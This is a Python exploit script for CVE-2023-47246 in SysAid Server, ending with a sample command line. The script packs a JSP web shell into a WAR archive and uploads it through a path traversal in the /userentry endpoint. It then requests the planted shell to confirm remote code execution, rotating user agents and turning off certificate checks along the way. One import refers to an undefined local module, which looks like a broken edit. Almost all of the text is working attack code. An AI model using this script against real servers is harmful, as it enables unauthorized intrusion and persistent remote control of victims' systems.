import argparse
import binascii
import random
import time
import zipfile
import zlib
import urllib3
import requests

urllib3.disable_warnings()

def compressFile(shellFile, warFile):
    try:
        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
            zipf.write(shellFile)
        zipf.close()
        return True
    except:
        return False


def getHexData(warFile):
    with open(warFile, 'rb') as warfile:
        data = warfile.read()
    warfile.close()
    compressed_data = zlib.compress(data)
    hex_data = binascii.hexlify(compressed_data).decode()
    return hex_data


def generateRandomDirectoryName(num):
    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    return ''.join(random.choice(charset) for _ in range(num))


def get_random_agent():
    agent_list = [
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
    ]
    return agent_list[random.randint(0, len(agent_list) - 1)]


def shellUpload(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": get_random_agent()
    }
    shellFileName = shellFile.split(".")[0]
    warFile = f"{shellFileName}.war"
    if compressFile(shellFile, warFile):
        shellHex = getHexData(warFile=warFile)
        data = binascii.unhexlify(shellHex)
        from myframework.encoder import base64_encode
        print(base64_encode(data=data))
        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
        print("\033[92m[+] Shell file compressed successfully!\033[0m")
        return resp
    else:
        print("\033[91m[x] Shell file compression failed.\033[0m")
        exit(0)


def shellTest(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/{directoryName}/{shellFile}"
    headers = {
        "User-Agent": get_random_agent()
    }
    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
    return resp, userEntryUrl

def exploit(url, proxy, shellFile):
    print(f"\033[94m[*] start to attack: {url}\033[0m")
    directoryName = generateRandomDirectoryName(5)
    userentryResp = shellUpload(url, proxy, directoryName, shellFile)
    print(f"\033[94m[*] Wait 9 seconds...\033[0m")
    time.sleep(9)
    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)
    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:
        print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}\033[0m")
    else:
        print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",
        add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")
    parser.add_argument("-u", "--url", help="target URL")
    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")
    args = parser.parse_args()
    if args.url.endswith("/"):
        url = args.url[:-1]
    else:
        url = args.url
    if args.proxy:
        proxy = {
            'http': args.proxy,
            'https': args.proxy
        }
    else:
        proxy = {}
    exploit(url, proxy, args.file)

python CVE-2023-47246-EXP.py -u http://host:8080 -p http://127.0.0.1:8088 -f 2.jsp